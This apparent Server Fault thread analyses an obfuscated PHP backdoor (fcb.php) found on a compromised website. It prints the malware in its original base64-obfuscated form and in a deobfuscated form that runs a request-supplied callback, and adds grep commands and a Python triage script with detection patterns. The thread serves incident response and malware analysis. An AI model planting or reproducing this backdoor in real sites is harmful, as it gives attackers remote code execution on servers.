
Here is the PHP script I have found at the root of each of my website folders. The script name is fcb.php

Content is:

<? $GLOBALS['_1303753477_']=Array(base64_decode('YX' .'JyYXlfZGlmZl91a2V5'),base64_decode('c3RyaXBz' .'bG' .'F' .'z' .'aGVz')); ?><? function _1935386521($i){$a=Array('cGFzc3dvcmQ=','cmVfcGFzc3dvcmQ=','bG9naW4=');return base64_decode($a[$i]);} ?><?php @$GLOBALS['_1303753477_'][0](@array((string)$_REQUEST[_1935386521(0)]=>round(0+0.25+0.25+0.25+0.25)),@array((string)$GLOBALS['_1303753477_'][1]($_REQUEST[_1935386521(1)])=>round(0+0.4+0.4+0.4+0.4+0.4)),$_REQUEST[_1935386521(2)]); ?>

Can somebody explain what this does? Thanks.

  • grep -R "Array(base64_decode" /path/to/root finds all files containing this code; remove it from those files. BTW, you must correct file/folder permissions and stop script execution in upload/image/static directories. Take a look at the Apache logs to find out how it was uploaded to your files. – Vaibhav Panmand Mar 31 '16 at 05:38
  • @VaibhavPanmand After a suspected breach, one does not simply `rm` a select few of the malicious files and go about one's business... (In case it isn't obvious, *you reinstall the bloody thing from scratch* because you can never be sure to find and revert all malicious changes on a compromised system.) – n.st Mar 31 '16 at 07:09
  • Hmm, I was scared I would have to reinstall the system. I think that this is also the safest way but I need to understand how it came in first or this will happen again. Thanks all for your answers. – Julien PhuketMyMac Mar 31 '16 at 07:20
  • Possible duplicate of [How do I deal with a compromised server?](http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – kasperd Apr 03 '16 at 10:54

1 Answer


It certainly looks like malware of some sort. My PHP is rusty; as far as I can unscramble it, it winds up looking like this:

<?php array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2), $_REQUEST['login']); ?>

Then, searching for what "stripslashes $_request re_password" does in Google led me to a lot of sites warning about PHP backdoors.

DarkMoon
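As an added example (not part of the question or the answer), the following Python script does mechanically what the answer did by hand: it re-joins the split base64 literals in the fcb.php sample, decodes the string table, and reports the obfuscation traits that the sample exhibits so the same checks can be run over every file under a web root. The indicator names and patterns are my own construction, chosen from what is visible in this one sample.

```python
"""Static triage of the obfuscated fcb.php sample posted in the question."""
import base64
import re
from typing import Optional

# The exact script from the question, embedded so this runs offline.
SAMPLE = r"""<? $GLOBALS['_1303753477_']=Array(base64_decode('YX' .'JyYXlfZGlmZl91a2V5'),base64_decode('c3RyaXBz' .'bG' .'F' .'z' .'aGVz')); ?><? function _1935386521($i){$a=Array('cGFzc3dvcmQ=','cmVfcGFzc3dvcmQ=','bG9naW4=');return base64_decode($a[$i]);} ?><?php @$GLOBALS['_1303753477_'][0](@array((string)$_REQUEST[_1935386521(0)]=>round(0+0.25+0.25+0.25+0.25)),@array((string)$GLOBALS['_1303753477_'][1]($_REQUEST[_1935386521(1)])=>round(0+0.4+0.4+0.4+0.4+0.4)),$_REQUEST[_1935386521(2)]); ?>"""

# One single-quoted PHP literal made only of base64 characters, e.g. 'YX'
_LITERAL = re.compile(r"'([A-Za-z0-9+/=]*)'")
# base64_decode('a' . 'b' . 'c'): a name split into pieces and re-joined with '.'
_SPLIT_CALL = re.compile(r"base64_decode\(((?:'[A-Za-z0-9+/=]*'\s*\.?\s*)+)\)")

# Traits of this sample worth grepping for elsewhere (constructed list, my own names)
INDICATORS = {
    "base64 lookup table": r"Array\(base64_decode",
    "numbered $GLOBALS slot": r"\$GLOBALS\['_\d+_'\]",
    "function called by name from $GLOBALS": r"\$GLOBALS\['_\d+_'\]\[\d+\]\(",
    "request data feeds the call": r"\$_REQUEST\[",
}

def _decode(b64: str) -> Optional[str]:
    """Decode one base64 string; None unless it is clean printable ASCII."""
    try:
        text = base64.b64decode(b64, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None

def decode_split_calls(php: str) -> list:
    """Join the pieces of each base64_decode('x' . 'y') call and decode them."""
    names = []
    for m in _SPLIT_CALL.finditer(php):
        joined = "".join(_LITERAL.findall(m.group(1)))
        names.append(_decode(joined) or "<undecodable>")
    return names

def decode_string_table(php: str) -> list:
    """Decode the remaining base64 literals (the Array(...) lookup table)."""
    rest = _SPLIT_CALL.sub("", php)  # skip the pieces already handled above
    found = [_decode(lit) for lit in _LITERAL.findall(rest)]
    return [s for s in found if s is not None]

def matched_indicators(php: str) -> list:
    """Names of the obfuscation traits present in the given PHP source."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, php)]

if __name__ == "__main__":
    # The third argument of array_diff_ukey is a callback, here taken from the request.
    print("functions called  :", decode_split_calls(SAMPLE))
    print("request parameters:", decode_string_table(SAMPLE))
    print("indicators        :", matched_indicators(SAMPLE))
```

Running it confirms the answer's reconstruction: the two hidden functions are array_diff_ukey and stripslashes, and the three request parameters are password, re_password and login.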